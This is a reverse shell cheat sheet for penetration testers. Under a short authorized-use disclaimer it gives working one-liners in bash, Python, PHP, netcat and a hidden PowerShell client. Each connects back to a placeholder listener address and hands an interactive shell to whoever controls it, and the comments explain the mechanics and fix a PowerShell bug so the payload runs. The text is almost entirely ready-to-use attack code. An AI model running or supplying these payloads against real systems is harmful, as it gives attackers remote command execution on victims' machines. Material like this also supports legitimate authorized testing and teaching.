Reverse Shell Cheat Sheet

For educational and authorized security testing only. Use these only against systems you own or have explicit, written permission to test; a reverse shell gives whoever controls the listener full command execution on the target.

Listener: start `nc -lvnp 4444` on the attacking host first. In every payload below, replace YOUR_IP with the listener's IP as reachable from the target and PORT with the listener's port (4444 in this example). The connection is plaintext and outbound from the target, so it must be allowed through the target's egress filtering.

Bash

# Interactive bash with stdin/stdout/stderr all attached to the TCP socket.
# `>&FILE` is bash shorthand for `>FILE 2>&1`; the explicit form below is identical.
# Relies on bash's /dev/tcp pseudo-device, so it must be run by bash, not /bin/sh.
bash -i >/dev/tcp/YOUR_IP/PORT 2>&1 0>&1

Python

# Python 3: connect back, point fds 0/1/2 at the socket, then run an interactive sh on top of them.
# subprocess.call is given an argv list (no shell=True), so nothing here is shell-interpolated.
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOUR_IP",PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call(["/bin/sh","-i"])'

PHP

# PHP CLI: fsockopen opens a stream to the listener; proc_open hands that same stream
# to sh as its fds 0, 1 and 2. The proc_open handle is not needed afterwards and is discarded.
php -r '$c=fsockopen("YOUR_IP",PORT);proc_open("/bin/sh -i",array(0=>$c,1=>$c,2=>$c),$p);'

Netcat

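# Netcat with -e: only some builds support it (e.g. ncat, nc.traditional); OpenBSD nc does not.
nc -e /bin/sh YOUR_IP PORT

# If -e not available: wire nc's output back into sh's stdin through a named pipe.
# The fixed path /tmp/f in the usual one-liner is guessable and could be pre-created by another
# local user; mktemp -u picks a fresh name, and mkfifo refuses to overwrite an existing path
# (it does not follow symlinks), so a planted file just makes the command fail instead of being used.
# The trailing rm removes the fifo once the session ends.
f=$(mktemp -u);mkfifo "$f";cat "$f"|/bin/sh -i 2>&1|nc YOUR_IP PORT >"$f";rm -f "$f"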

PowerShell (Windows)

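# PowerShell TCP client reverse shell. Bug fix: the TCPClient must be assigned to $client, otherwise
# $client is $null and both $client.GetStream() and $client.Close() fail, so the shell never starts.
# Each line received from the listener is passed to iex (Invoke-Expression), i.e. run as PowerShell.
# -Exec Bypass only relaxes the execution policy for this process; it is not a security boundary.
# This is written for cmd.exe. From a Unix shell, escape every `$` (\$client, \$stream, ...) or
# the outer double quotes will let the local shell expand the PowerShell variables to empty strings.
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client=New-Object System.Net.Sockets.TCPClient('YOUR_IP',PORT);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"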